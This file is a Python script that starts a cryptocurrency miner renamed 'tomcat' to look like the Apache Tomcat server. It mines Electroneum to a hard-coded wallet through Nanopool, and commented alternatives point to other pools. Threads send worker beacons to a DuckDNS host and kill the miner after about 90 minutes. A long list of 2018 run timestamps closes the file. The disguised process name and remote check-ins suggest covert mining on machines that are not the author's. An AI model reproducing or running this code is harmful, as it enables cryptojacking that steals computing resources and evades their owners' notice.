import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:38:05.200431
#2018-02-17 16:23:06.695961
#2018-02-17 18:10:07.792466
#2018-02-17 19:58:07.387287
#2018-02-17 21:47:04.257389
#2018-02-17 23:32:04.943632
#2018-02-18 01:20:08.247784
#2018-02-18 03:07:05.614482
#2018-02-18 04:56:05.358835
#2018-02-18 06:49:01.543886
#2018-02-18 08:38:01.577645
#2018-02-18 10:24:01.263334
#2018-02-18 12:10:05.314064
#2018-02-18 13:56:06.826436
#2018-02-18 15:46:05.307209
#2018-02-18 17:36:04.466178
#2018-02-18 19:24:02.049466
#2018-02-18 21:09:03.173652
#2018-02-18 22:56:06.667821
#2018-02-19 00:46:01.645190
#2018-02-19 02:33:04.121626
#2018-02-19 04:19:04.586009
#2018-02-19 06:04:05.372480
#2018-02-19 07:52:03.822163
#2018-02-19 09:42:06.116136
#2018-02-19 11:32:10.219020
#2018-02-19 13:19:06.039870
#2018-02-19 15:07:06.401867
#2018-02-19 16:54:07.522421
#2018-02-19 18:42:06.694422
#2018-02-19 20:31:03.945634
#2018-02-19 22:18:03.861001
#2018-02-20 00:03:02.027591
#2018-02-20 01:50:06.446503
#2018-02-20 03:38:05.089031
#2018-02-20 05:23:05.881474
#2018-02-20 07:09:04.632856
#2018-02-20 08:55:03.543325
#2018-02-20 10:39:07.510153
#2018-02-20 12:26:06.773391
#2018-02-20 14:13:05.297396
#2018-02-20 15:57:07.981963
#2018-02-20 17:44:02.079215
#2018-02-20 19:36:05.214761
#2018-02-20 21:23:05.556954
#2018-02-20 23:07:04.177125
#2018-02-21 00:50:04.040885
#2018-02-21 02:35:03.739407
#2018-02-21 04:23:02.003007
#2018-02-21 06:11:11.289037
#2018-02-21 07:57:03.359302
#2018-02-21 09:42:06.534537
#2018-02-21 11:31:09.674604
#2018-02-21 13:19:09.910657
#2018-02-21 15:04:05.990657
#2018-02-21 16:54:04.754520
#2018-02-21 18:41:06.433773
#2018-02-21 20:27:07.253042
#2018-02-21 22:15:10.733998
#2018-02-22 00:06:04.147279
#2018-02-22 01:55:06.207077
#2018-02-22 03:42:05.469933
#2018-02-22 05:29:07.233542
#2018-02-22 07:14:07.003099
#2018-02-22 09:03:04.983960
#2018-02-22 10:51:04.752829
#2018-02-22 12:37:07.771594
#2018-02-22 14:21:02.229612
#2018-02-22 16:09:05.875794
#2018-02-22 17:54:08.062617
#2018-02-22 19:42:07.590849
#2018-02-22 21:33:09.328123
#2018-02-22 23:22:01.770747
#2018-02-23 01:08:06.192854
#2018-02-23 02:55:08.803188
#2018-02-23 04:43:01.912531
#2018-02-23 06:29:07.656882
#2018-02-23 08:16:08.175341
#2018-02-23 10:32:07.795975
#2018-02-23 12:26:08.326655
#2018-02-23 14:15:09.916390
#2018-02-23 16:08:06.404631
#2018-02-23 17:54:08.050855
#2018-02-23 19:41:05.345786
#2018-02-23 21:24:04.195423
#2018-02-23 23:12:05.410054
#2018-02-24 00:59:07.386900
#2018-02-24 02:53:02.176643
#2018-02-24 04:43:04.036945
#2018-02-24 06:27:05.597119
#2018-02-24 08:16:05.276664
#2018-02-24 10:01:07.695509
#2018-02-24 11:59:06.225018
#2018-02-24 13:46:06.581191
#2018-02-24 15:36:07.797653
#2018-02-24 17:31:01.284202
#2018-02-24 19:17:07.571691
#2018-02-24 21:06:07.813771
#2018-02-24 23:39:07.069856
#2018-02-25 02:59:03.904582
#2018-02-25 06:57:04.711000